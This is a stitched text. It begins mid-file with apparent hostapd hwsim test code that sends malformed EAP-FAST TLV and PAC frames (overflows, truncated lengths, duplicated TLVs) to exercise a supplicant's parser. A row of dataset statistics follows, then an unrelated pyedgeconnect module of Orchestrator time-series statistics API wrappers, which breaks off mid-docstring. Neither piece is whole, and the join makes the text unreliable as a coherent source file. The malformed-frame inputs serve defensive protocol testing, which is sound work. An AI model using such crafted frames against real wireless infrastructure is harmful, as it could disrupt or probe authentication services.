identity="sake user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=10)
if ev is None or "NAK" not in ev:
raise Exception("No NAK event seen")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
EAP_TLV_RESULT_TLV = 3
EAP_TLV_NAK_TLV = 4
EAP_TLV_ERROR_CODE_TLV = 5
EAP_TLV_CONNECTION_BINDING_TLV = 6
EAP_TLV_VENDOR_SPECIFIC_TLV = 7
EAP_TLV_URI_TLV = 8
EAP_TLV_EAP_PAYLOAD_TLV = 9
EAP_TLV_INTERMEDIATE_RESULT_TLV = 10
EAP_TLV_PAC_TLV = 11
EAP_TLV_CRYPTO_BINDING_TLV = 12
EAP_TLV_CALLING_STATION_ID_TLV = 13
EAP_TLV_CALLED_STATION_ID_TLV = 14
EAP_TLV_NAS_PORT_TYPE_TLV = 15
EAP_TLV_SERVER_IDENTIFIER_TLV = 16
EAP_TLV_IDENTITY_TYPE_TLV = 17
EAP_TLV_SERVER_TRUSTED_ROOT_TLV = 18
EAP_TLV_REQUEST_ACTION_TLV = 19
EAP_TLV_PKCS7_TLV = 20
EAP_TLV_RESULT_SUCCESS = 1
EAP_TLV_RESULT_FAILURE = 2
EAP_TLV_TYPE_MANDATORY = 0x8000
EAP_TLV_TYPE_MASK = 0x3fff
PAC_TYPE_PAC_KEY = 1
PAC_TYPE_PAC_OPAQUE = 2
PAC_TYPE_CRED_LIFETIME = 3
PAC_TYPE_A_ID = 4
PAC_TYPE_I_ID = 5
PAC_TYPE_A_ID_INFO = 7
PAC_TYPE_PAC_ACKNOWLEDGEMENT = 8
PAC_TYPE_PAC_INFO = 9
PAC_TYPE_PAC_TYPE = 10
def eap_fast_start(ctx):
logger.info("Send EAP-FAST/Start")
return struct.pack(">BBHBBHH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 16,
EAP_TYPE_FAST, 0x21, 4, 16) + 16*'A'
def test_eap_fast_proto(dev, apdev):
"""EAP-FAST Phase protocol testing"""
check_eap_capa(dev[0], "FAST")
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("EAP-FAST: TLS processing failed")
data = 'ABCDEFGHIK'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def run_eap_fast_phase2(dev, test_payload, test_failure=True):
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def ssl_info_callback(conn, where, ret):
logger.debug("SSL: info where=%d ret=%d" % (where, ret))
def log_conn_state(conn):
try:
state = conn.state_string()
except AttributeError:
state = conn.get_state_string()
if state:
logger.info("State: " + state)
def process_clienthello(ctx, payload):
logger.info("Process ClientHello")
ctx['sslctx'] = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx['sslctx'].set_info_callback(ssl_info_callback)
ctx['sslctx'].load_tmp_dh("auth_serv/dh.conf")
ctx['sslctx'].set_cipher_list("ADH-AES128-SHA")
ctx['conn'] = OpenSSL.SSL.Connection(ctx['sslctx'], None)
ctx['conn'].set_accept_state()
log_conn_state(ctx['conn'])
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
log_conn_state(ctx['conn'])
data = ctx['conn'].bio_read(4096)
log_conn_state(ctx['conn'])
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def process_clientkeyexchange(ctx, payload, appl_data):
logger.info("Process ClientKeyExchange")
log_conn_state(ctx['conn'])
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
ctx['conn'].send(appl_data)
log_conn_state(ctx['conn'])
data = ctx['conn'].bio_read(4096)
log_conn_state(ctx['conn'])
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
logger.debug("ctx['num']=%d" % ctx['num'])
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
return process_clienthello(ctx, req[6:])
idx += 1
if ctx['num'] == idx:
if not test_failure:
ctx['test_done'] = True
return process_clientkeyexchange(ctx, req[6:], test_payload)
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
dev[0].dump_monitor()
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if not ok:
raise Exception("EAP-FAST TLS exchange did not complete")
for i in range(3):
dev[i].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_fast_proto_phase2(dev, apdev):
"""EAP-FAST Phase 2 protocol testing"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0])
tests = [ ("Too short Phase 2 TLV frame (len=3)",
"ABC",
False),
("EAP-FAST: TLV overflow",
struct.pack(">HHB", 0, 2, 0xff),
False),
("EAP-FAST: Unknown TLV (optional and mandatory)",
struct.pack(">HHB", 0, 1, 0xff) +
struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY, 1, 0xff),
True),
("EAP-FAST: More than one EAP-Payload TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff,
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Result 255 and More than one Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_RESULT_TLV, 2, 0xff,
EAP_TLV_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Result TLV",
struct.pack(">HHB", EAP_TLV_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Intermediate Result 255 and More than one Intermediate-Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff,
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Intermediate-Result TLV",
struct.pack(">HHB", EAP_TLV_INTERMEDIATE_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Crypto-Binding TLV in the message",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A' +
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True),
("EAP-FAST: Too short Crypto-Binding TLV",
struct.pack(">HHB", EAP_TLV_CRYPTO_BINDING_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Request-Action TLV in the message",
struct.pack(">HHBBHHBB",
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff,
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff),
True),
("EAP-FAST: Too short Request-Action TLV",
struct.pack(">HHB", EAP_TLV_REQUEST_ACTION_TLV, 1, 0xff),
True),
("EAP-FAST: More than one PAC TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_PAC_TLV, 1, 0xff,
EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Too short EAP Payload TLV (Len=3)",
struct.pack(">HH3B",
EAP_TLV_EAP_PAYLOAD_TLV, 3, 0, 0, 0),
False),
("EAP-FAST: Too short Phase 2 request (Len=0)",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 0),
False),
("EAP-FAST: EAP packet overflow in EAP Payload TLV",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 4 + 1),
False),
("EAP-FAST: Unexpected code=0 in Phase 2 EAP header",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
0, 0, 0),
False),
("EAP-FAST: PAC TLV without Result TLV acknowledging success",
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: PAC TLV does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Invalid PAC-Key length 0, Ignored unknown PAC type 0, and PAC TLV overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHB", EAP_TLV_PAC_TLV, 4 + 4 + 5,
PAC_TYPE_PAC_KEY, 0, 0, 0, 0, 2, 0),
True),
("EAP-FAST: PAC-Info does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid CRED_LIFETIME length, Ignored unknown PAC-Info type 0, and Invalid PAC-Type length 1",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 13 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 13, PAC_TYPE_CRED_LIFETIME, 0,
0, 0, PAC_TYPE_PAC_TYPE, 1, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Unsupported PAC-Type 0",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 6 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 6, PAC_TYPE_PAC_TYPE, 2, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: PAC-Info overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 5 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 5, 0, 2, 1,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Valid PAC",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHHBHH", EAP_TLV_PAC_TLV,
4 + 4 + 10 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 10, PAC_TYPE_A_ID, 1, 0x41,
PAC_TYPE_A_ID_INFO, 1, 0x42,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid version/subtype in Crypto-Binding TLV",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True) ]
for title, payload, failure in tests:
logger.info("Phase 2 test: " + title)
run_eap_fast_phase2(dev, payload, failure)
def test_eap_fast_tlv_nak_oom(dev, apdev):
"""EAP-FAST Phase 2 TLV NAK OOM"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_fast_tlv_nak"):
run_eap_fast_phase2(dev, struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY,
1, 0xff), False)
| 44.039188 | 189 | 0.480984 | 43,745 | 370,854 | 3.875437 | 0.026883 | 0.00945 | 0.032041 | 0.034613 | 0.899423 | 0.873864 | 0.853531 | 0.840625 | 0.824988 | 0.813161 | 0 | 0.063639 | 0.396757 | 370,854 | 8,420 | 190 | 44.044418 | 0.69416 | 0.005196 | 0 | 0.771376 | 0 | 0.003157 | 0.188229 | 0.051332 | 0 | 0 | 0.007614 | 0.000119 | 0 | 1 | 0.013154 | false | 0.026835 | 0.003026 | 0.000395 | 0.111944 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d3c6338b040d67cfc71f55638c2ac082abcf8a7d | 88,265 | py | Python | pyedgeconnect/orch/_timeseries_stats.py | SPOpenSource/edgeconnect-python | 158aad220f8cacfa029df41b0ac2a37f7dac943f | [
"MIT"
] | 15 | 2021-07-02T17:09:13.000Z | 2022-02-08T17:06:51.000Z | pyedgeconnect/orch/_timeseries_stats.py | SPOpenSource/edgeconnect-python | 158aad220f8cacfa029df41b0ac2a37f7dac943f | [
"MIT"
] | null | null | null | pyedgeconnect/orch/_timeseries_stats.py | SPOpenSource/edgeconnect-python | 158aad220f8cacfa029df41b0ac2a37f7dac943f | [
"MIT"
] | 4 | 2021-07-16T00:05:24.000Z | 2022-03-26T02:04:17.000Z | # MIT License
# (C) Copyright 2021 Hewlett Packard Enterprise Development LP.
#
# timeseriesStats : ECOS time series statistics
def get_timeseries_stats_appliance_process_state(
self,
ne_pk: str,
) -> list:
"""Get time series appliance process state statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/applianceProcessState/{nePk}
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:return: Returns list of dictionaries
:rtype: list
"""
return self._get(
"/stats/timeseries/applianceProcessState/{}".format(ne_pk)
)
def get_timeseries_stats_orchestrator_memory(
self,
start_time: int,
end_time: int,
key: str = None,
) -> list:
"""Get time series memory statistics for Orchestrator
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/metrics
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param key: Swagger docs "For now it should be empty",
defaults to None
:type key: str, optional
:return: Returns list of dictionaries, all memory values are in KB
:rtype: list
"""
path = "/stats/timeseries/metrics?startTime={}&endTime={}".format(
start_time, end_time
)
if key is not None:
path = path + "&key={}".format(key)
return self._get(path)
def get_timeseries_stats_tunnel_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
tunnel_name: str,
granularity: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series tunnel statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/tunnel/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param tunnel_name: Filter for data which belongs to specified
tunnel name
:type tunnel_name: str
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/tunnel/"
+ "{}?startTime={}&endTime={}&granularity={}&tunnel_name={}".format(
ne_pk, start_time, end_time, granularity, tunnel_name
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_appliances(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series appliance statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/appliance
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_appliances_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series appliance statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/appliance
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are "optimized_traffic" "pass_through_shaped"
"pass_through_unshaped" "all_traffic", defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_appliances_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""
Get time series appliance statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/appliance/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to None
:type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID, defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/appliance/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_traffic_class(
self,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
group_pk: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/trafficClass
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_traffic_class_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/trafficClass
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
